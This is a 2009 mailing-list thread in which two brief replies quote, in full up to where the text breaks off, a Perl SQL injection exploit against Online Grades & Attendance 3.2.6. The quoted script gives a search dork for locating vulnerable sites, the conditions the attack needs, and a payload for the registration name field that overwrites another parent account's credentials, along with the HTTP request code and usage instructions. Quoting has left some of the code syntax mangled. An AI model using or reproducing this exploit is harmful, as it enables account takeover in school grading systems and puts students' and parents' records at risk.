Re: (Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--

2009-06-01 Thread Jeremy Brown 
Why do you include TESTED ON: firefox 3? Would you not be able to
trigger this bug using other browsers?

On Sun, May 31, 2009 at 8:53 PM,  y3nh4c...@gmail.com wrote:
 #!/usr/bin/perl
 #---
 #(Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- 
 Online Grades  Attendance v-3.2.6--
 #---
 #
 #CMS INFORMATION:
 #
 #--WEB: http://www.onlinegrades.org/
 #--DOWNLOAD: http://www.onlinegrades.org/
 #--DEMO: http://www.onlinegrades.org/demo_info
 #--CATEGORY: CMS / Education
 #--DESCRIPTION: Online Grades is based on the project, Basmati. It has all 
 of the same
 #               features plus many new features. OG is a web based grade...
 #--RELEASED: 2009-02-05
 #
 #CMS VULNERABILITY:
 #
 #--TESTED ON: firefox 3
 #--DORK: Powered by Online Grades
 #--CATEGORY: SQL INJECTION
 #--AFFECT VERSION: = 3.2.6
 #--Discovered Bug date: 2009-05-21
 #--Reported Bug date: 2009-05-21
 #--Fixed bug date: Not fixed
 #--Info patch: Not fixed
 #--Author: YEnH4ckEr
 #--mail: y3nh4ck3r[at]gmail[dot]com
 #--WEB/BLOG: N/A
 #--COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por 
 su apoyo.
 #--EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)
 #
 #
 #
 #CONDITIONS:
 #
 #
 #gpc_magic_quotes=OFF
 #
 #-
 #PRE-REQUIREMENTS
 #-
 #
 #Option -- Self Registration -- Allowed (Default value)
 #
 #---
 #NEED:
 #---
 #
 #Valid parent id
 #
 #---
 #PROOF OF CONCEPT (SQL INJECTION):
 #---
 #
 #Register module (name) is vuln to sql injection.
 #
 #Full name -- y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'#
 #
 #Other parameters -- something
 #
 #
 #Return: Change client_id to 'owned' for parent id=1
 #
 #
 ###
 ###
 ##***##
 ##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
 ##***##
 ##---##
 ##***##
 ##              GREETZ TO: SPANISH H4ck3Rs community!                ##
 ##***##
 ###
 ###
 #
 #
 use LWP::UserAgent;
 use HTTP::Request;
 #Subroutines
 sub lw
 {
        my $SO = $^O;
        my $linux = ;
        if (index(lc($SO),win)!=-1){
                $linux=0;
        }else{
                $linux=1;
        }
        if($linux){
                system(clear);
        }
        else{
                system(cls);
                system (title Online Grades Attendance v-3.2.6 (Credentials 
 changer) Exploit);
                system (color 02);
        }
 }
 sub request {
        my $userag = LWP::UserAgent-new;
        $userag - agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
        if($_[2] eq post){
                $request = HTTP::Request - new(POST = $_[0]);
                $request-referer($_[0]);
                $request-content_type('application/x-www-form-urlencoded');
                $request-content($_[1]);
        }else{
                $request = HTTP::Request - new(GET = $_[0]);
        }
        my $outcode= $userag-request($request)-as_string;
        return $outcode;
 }
 sub error {
 print \t\n;
        print \tWeb isn't vulnerable!\n\n;
        print \t---Maybe:\n\n;
        print \t\t1.-Patched.\n;
        print \t\t2.-Bad path or host.\n;
        print \t\tEXPLOIT FAILED!\n;
        print 
 \t\n;
 }
 sub errormagicquotes {
 print \t\n;
        print \tWeb isn't vulnerable!\n\n;
        print \t\tRaison-- Magic quotes ON.\n;
        print \t\tEXPLOIT FAILED!\n;
        print 
 \t\n;
 }
 sub helper {
        print \n\t[!!!] Online Grades  Attendance = v-3.2.6 (Credentials 
 changer) Exploit\n;
        print \t[!!!] USAGE MODE: [!!!]\n;
        print \t[!!!] perl $0 [HOST] [PATH] [Email Address] [Password] 
 [Target_id]\n;
        print \t[!!!] [HOST]: Web.\n;
        print \t[!!!] [PATH]: Home Path.\n;
        print \t[!!!] [Email Address]: Set value\n;
        print \t[!!!] [Password]: Set value\n;
        print \t[!!!] [Target_id]: victim id\n

Re: Re: (Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- Online Grades Attendance v-3.2.6--

2009-06-01 Thread y3nh4ck3r 
Of course not. I include this information to report in details



Then...when do you need a browser to launch a perl exploit?



Why do you include TESTED ON: firefox 3? Would you not be able to

trigger this bug using other browsers?



On Sun, May 31, 2009 at 8:53 PM, y3nh4ck3r (at) gmail (dot) com [email 
concealed] wrote:

 #!/usr/bin/perl

 #---



 #(Post Form -- Parent Register (name)) Credentials Changer (SQLi) EXPLOIT -- 
 Online Grades  Attendance v-3.2.6--

 #---



 #

 #CMS INFORMATION:

 #

 #--WEB: http://www.onlinegrades.org/

 #--DOWNLOAD: http://www.onlinegrades.org/

 #--DEMO: http://www.onlinegrades.org/demo_info

 #--CATEGORY: CMS / Education

 #--DESCRIPTION: Online Grades is based on the project, Basmati. It has all 
 of the same

 #   features plus many new features. OG is a web based grade...

 #--RELEASED: 2009-02-05

 #

 #CMS VULNERABILITY:

 #

 #--TESTED ON: firefox 3

 #--DORK: Powered by Online Grades

 #--CATEGORY: SQL INJECTION

 #--AFFECT VERSION: = 3.2.6

 #--Discovered Bug date: 2009-05-21

 #--Reported Bug date: 2009-05-21

 #--Fixed bug date: Not fixed

 #--Info patch: Not fixed

 #--Author: YEnH4ckEr

 #--mail: y3nh4ck3r[at]gmail[dot]com

 #--WEB/BLOG: N/A

 #--COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por 
 su apoyo.

 #--EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

 #

 #

 #

 #CONDITIONS:

 #

 #

 #gpc_magic_quotes=OFF

 #

 #-

 #PRE-REQUIREMENTS

 #-

 #

 #Option -- Self Registration -- Allowed (Default value)

 #

 #---

 #NEED:

 #---

 #

 #Valid parent id

 #

 #---

 #PROOF OF CONCEPT (SQL INJECTION):

 #---

 #

 #Register module (name) is vuln to sql injection.

 #

 #Full name -- y3nh4ck3r', id=1 ON DUPLICATE KEY UPDATE client_id='owned'#

 #

 #Other parameters -- something

 #

 #

 #Return: Change client_id to 'owned' for parent id=1

 #

 #

 ###

 ###

 ##***##

 ##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##

 ##***##

 ##---##

 ##***##

 ##  GREETZ TO: SPANISH H4ck3Rs community!##

 ##***##

 ###

 ###

 #

 #

 use LWP::UserAgent;

 use HTTP::Request;

 #Subroutines

 sub lw

 {

my $SO = $^O;

my $linux = ;

if (index(lc($SO),win)!=-1){

$linux=0;

}else{

$linux=1;

}

if($linux){

system(clear);

}

else{

system(cls);

system (title Online Grades Attendance v-3.2.6 (Credentials 
 changer) Exploit);

system (color 02);

}

 }

 sub request {

my $userag = LWP::UserAgent-new;

$userag - agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

if($_[2] eq post){

$request = HTTP::Request - new(POST = $_[0]);

$request-referer($_[0]);

$request-content_type('application/x-www-form-urlencoded');

$request-content($_[1]);

}else{

$request = HTTP::Request - new(GET = $_[0]);

}

my $outcode= $userag-request($request)-as_string;

return $outcode;

 }

 sub error {

 print \t\n;

print \tWeb isn't vulnerable!\n\n;

print \t---Maybe:\n\n;

print \t\t1.-Patched.\n;

print \t\t2.-Bad path or host.\n;

print \t\tEXPLOIT FAILED!\n;

print 
 \t\n;

 }

 sub errormagicquotes {

 print \t\n;

print \tWeb isn't vulnerable!\n\n;

print \t\tRaison-- Magic quotes ON.\n;

print \t\tEXPLOIT FAILED!\n;

print 
 \t\n;

 }

 sub helper {

print \n\t[!!!] Online Grades  Attendance = v-3.2.6 (Credentials 
 changer) Exploit\n;

print \t[!!!] USAGE MODE: [!!!]\n;

print \t